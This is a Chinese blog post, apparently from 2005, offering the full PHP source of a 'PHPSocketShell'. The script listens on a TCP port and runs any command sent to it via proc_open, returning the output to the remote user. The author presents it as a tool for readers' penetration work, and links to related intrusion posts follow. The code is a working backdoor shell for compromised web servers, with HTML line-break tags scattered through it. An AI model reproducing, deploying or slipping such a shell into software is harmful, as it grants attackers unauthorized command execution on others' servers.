来自：我非我’blog
很早写出来的东西.练手用的.当时某些国外用socket的phpshell似乎还没有出来.(就算出来了我这也好歹是国产的吧?)会用的就自己修改下,相信对你的渗透有用. : )

<?php<br /> //<br /> //PHPSocketShell<br /> //Version 1.0 Date:2005-07-22 <br /> //Codz by darkne2s&wofeiwo, thx darkne2s’ help :)<br /> //Just for study<br /> //<br /> error_reporting(E_ALL); // 关闭脚本时间限制，使php能够阻塞操作socket<br /> set_time_limit(0);<br /> ob_implicit_flush();</p> <p>if (!extension_loaded(‘sockets’)) { <br />  dl(‘php_sockets.dll’) or die (‘Unable dl php_sockets.dll’);<br /> }</p> <p>// bind的地址与端口<br /> $address = ’127.0.0.1′;<br /> $port = 3333;</p> <p>if (($sock = socket_create(AF_INET, SOCK_STREAM, SOL_TCP)) < 0) { <br />  echo ”socket_create() failed: reason: ” . socket_strerror($sock) . ”\n”;<br /> }<br /> if (($ret = socket_bind($sock, $address, $port)) < 0) { <br />  echo ”socket_bind() failed: reason: ” . socket_strerror($ret) . ”\n”;<br /> }<br /> if (($ret = socket_listen($sock, 5)) < 0) { <br />  echo ”socket_listen() failed: reason: ” . socket_strerror($ret) . ”\n”;<br /> }<br /> do { <br />  if (($msgsock = socket_accept($sock)) < 0) { <br />  echo ”socket_accept() failed: reason: ” . socket_strerror($msgsock) . ”\n”;<br />  break;<br />  }<br />  $descriptorspec = array(<br />  0 => array(“pipe”, ”r”), // stdin 标准输入，读管道<br />  1 => array(“pipe”, ”w”), // stdout 标准输出，写管道<br />  2 => array(“pipe”, ”w”) // stderr 标准错误输出<br />  );</p> <p> $msg = ”Welcome to the PHPCMDSHELL!\r\n”;<br />  if (strlen($msg) != 0){ <br />  socket_write($msgsock, $msg, strlen($msg));<br />  }<br />  do { <br />  if (false === socket_recv($msgsock, $buf , 1024, 0)) { <br />  echo ”客户端已经退出\n”;<br />  break 2;<br />  }<br />  if (!$buf = trim($buf)) { <br />  continue;<br />  }<br />  if ($buf == ’quit’) { <br />  break;<br />  }<br />  if ($buf == ’shutdown’) { <br />  fclose($pipes[0]);<br />  fclose($pipes[1]);<br />  proc_close($process);<br />  socket_close($msgsock);<br />  break 2;<br />  }<br />  $process = proc_open($buf, $descriptorspec, $pipes);<br />  fwrite($pipes[0], ”".$buf.”\r\n”);<br />  while (!feof($pipes[1])) { <br />  $msg = fread($pipes[1], 1024);<br />  socket_write($msgsock, $msg, strlen($msg));<br />  }<br />  } while (true);</p> <p> fclose($pipes[0]); // 关闭管道是个好习惯 ：）<br />  fclose($pipes[1]);<br />  proc_close($process);<br />  socket_close($msgsock);<br /> } while (true);</p> <p>socket_close($sock);<br /> ?>

你也许还想了解这些

• 2005年12月6日 -- PHP 4.1.0 – php.ini 全文翻译
• 2005年08月6日 -- “黑白”大战30天
• 2005年08月6日 -- httpd.conf中文说明
• 2006年03月10日 -- Backup your Linux System|备份你的 Linux 系统
• 2006年02月5日 -- Hackfing in Mysql5
• 2006年01月8日 -- 渗透某知名公司内部网络
• 2005年12月5日 -- Serv-U.php：黑暗中的光芒
• 2005年10月24日 -- CSDN总结精华ASP 代码
• 2006年06月14日 -- 国内国外免费在线杀毒网站
• 2006年06月13日 -- 入侵网站的各种漏洞的利用